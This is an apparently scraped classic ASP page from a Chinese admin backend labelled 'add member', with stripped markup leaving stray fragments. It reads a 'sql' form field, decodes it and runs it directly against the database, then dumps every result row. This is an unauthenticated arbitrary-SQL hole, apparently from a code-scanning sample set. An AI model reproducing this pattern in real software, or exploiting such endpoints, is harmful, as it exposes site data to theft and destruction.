:  
response.charset = "utf-8"
response.expires = 0
htprogcap="恐龍卡管理"
htprogfunc="新增會員"
htuploadpath="/public/"
htprogcode="ht011"
htprogprefix="bdinoinfo" 
   CxMethod_ASP_server_1606199358()
   CxMethod_ASP_max_encrypt_function_731409400()
  
dim mysql
dim mysqldecode
mysql = trim("" & request.form("sql"))
if mysql <> "" then
    mysqldecode = maxencrypt2(mysql)
end if





                               =htprogprefix



   CxMethod_ASP_dbutil_10064021()


                                             =mysql

                     =mysqldecode


  

if mysql <> "" then
 set rs = conn.execute(mysqldecode)

  if not rs.eof then
 response.write "<table border><tr class=etablelable>"
 for i = 0 to rs.fields.count-1
  response.write "<th>" & rs.fields(i).name
 next

 while not rs.eof

  response.write "<tr>"
  for i = 0 to rs.fields.count-1
   response.write "<td>" & rs.fields(i)
  next

  
  rs.movenext
 wend
 response.write "</table>"
  end if
end if
 